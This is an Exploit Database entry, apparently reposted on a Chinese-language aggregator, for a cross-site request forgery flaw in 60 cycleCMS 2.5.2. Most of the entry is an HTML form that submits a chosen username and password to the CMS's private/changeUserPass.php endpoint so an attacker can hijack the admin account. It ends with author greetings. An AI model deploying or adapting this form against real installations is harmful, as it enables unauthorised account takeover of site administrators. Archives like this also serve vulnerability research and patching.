60 cycleCMS 2.5.2 – Cross-Site Request Forgery (Change Username and Password)

• Exploit Database
• 14 阅读

• 作者： EL-KAHINA
  日期： 2010-04-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12266/

• ========================================================================================
  | # Title: 60 cycleCMS V 2.5.2 CSRF Change Username & Password Exploit
  | # Author : EL-KAHINA 
  | # Home : www.iqs3cur1ty.com/vb 
  | # Web Site : http://php.opensourcecms.com/scripts/details.php?scriptid=337
  | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) 
  | # Bug: CSRF
  ======================Exploit By indoushka =================================
   # Exploit: 
   
  <html>
  <body>
  <h2>Change Username or Password</h2>
  <p>Enter desired username and password.</p>
  <form action="http://127.0.0.1/60cycleCMS.2.5.2/private/changeUserPass.php" method="post" name="changeUserPass">
  Desired Username: <input name="user" type="text" /><br />
  Desired Password: <input name="pass" type="password"/><br />
  Confirm Desired Password: <input name="passConfirm" type="password"/><br />
  <input type="button" value="Submit" onclick="checkForm(this.form)" />
  </form>
  </body>
  </html>
   
  ==========================================
  Greetz : Exploit-db Team 
  all my friend :(Dz-Ghost Team ) 
  im indoushka's sister
  ------------------------------------------